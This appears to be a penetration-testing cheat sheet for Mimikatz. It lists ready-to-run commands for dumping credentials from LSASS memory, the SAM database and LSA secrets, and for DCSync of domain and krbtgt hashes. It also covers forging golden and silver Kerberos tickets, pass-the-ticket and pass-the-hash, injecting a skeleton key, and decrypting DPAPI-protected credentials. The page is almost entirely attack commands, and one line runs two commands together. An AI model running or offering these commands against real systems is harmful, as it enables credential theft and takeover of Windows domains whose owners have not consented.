Skip to main content

Mimikatz

Starting Mimikatz

Interactive Mode

.\mimikatz.exe

Single Command Execution

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "token::elevate" "lsadump::sam" "exit"

Enable Debug Privileges

privilege::debug

Core Commands

General Commands

help                     #List all available commands
exit #Quit Mimikatz
log file.txt #Log all output to a file
version #Display Mimikatz version

Privilege Escalation

privilege::debug         #Enable debug privileges
token::whoami #Check the current token privileges
token::elevate #Attempt to elevate the token privileges
token::revert #Revert to original token

Password and Hash Dumping

Local Credential Dumping

sekurlsa::logonpasswords     #Dump credentials of logged-in users
sekurlsa::credman #Retrieve saved credentials in Credential Manager

Extract NTLM Hashes

lsadump::sam                 #Dump hashes from the SAM database
lsadump::lsa /inject #Extract secrets from LSA
lsadump::secrets #Extract stored secrets (e.g., service account passwords)

Domain Controller Hash Extraction (DCSync)

lsadump::dcsync /domain:example.com /user:Administrator  #Sync NTLM hash for user
lsadump::dcsync /all /domain:example.com #Sync all domain NTLM hashes
lsadump::dcsync /domain:example.com /user:krbtgt #Extract Kerberos TGT hash

Kerberos Operations

List and Export Tickets

kerberos::list                 #List all Kerberos tickets
kerberos::list /export #Export tickets to .kirbi files

Pass-the-Ticket

kerberos::ptt ticket.kirbi     #Inject a Kerberos ticket

Golden Ticket Creation

kerberos::golden /domain:<domain> /sid:S-1-5-21... /krbtgt:<hash> /user:Administrator

Silver Ticket Creation

kerberos::golden /domain:<domain> /sid:S-1-5-21... /target:SERVER /rc4:<hash> /user:User

Kerberos Delegation Tickets

kerberos::golden /domain:<domain> /sid:S-1-5-21... /user:Administrator /rc4:<hash> /service:krbtgt

Pass-the-Hash

Perform Pass-the-Hash Attack

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash> /run:cmd.exe

Combine with PowerShell

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash> /run:powershell.exe

Dumping LSASS Memory

Live Dump

Extract credentials directly from memory:

sekurlsa::logonpasswords

Offline Analysis

procdump.exe -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords"

Generating Skeleton Keys

Inject a universal key to authenticate any domain account:

misc::skeleton

Credential Extraction via DPAPI

Extract Master Keys

dpapi::masterkey /in:<file>

Decrypt Credentials

dpapi::cred /in:<credential_file>
dpapi::wifi /in:<wireless_profile.xml>

Exporting and Logging

Export Logs

Save output to a file:

log log.txt

Export Kerberos Tickets

Save tickets to .kirbi files:

kerberos::list /export

Advanced Examples and Use Cases

Extracting Service Account Passwords

lsadump::secrets /inject

Bypassing RunAs Restrictions

token::elevatemisc::cmd

Stealing Cached Credentials

sekurlsa::logonpasswords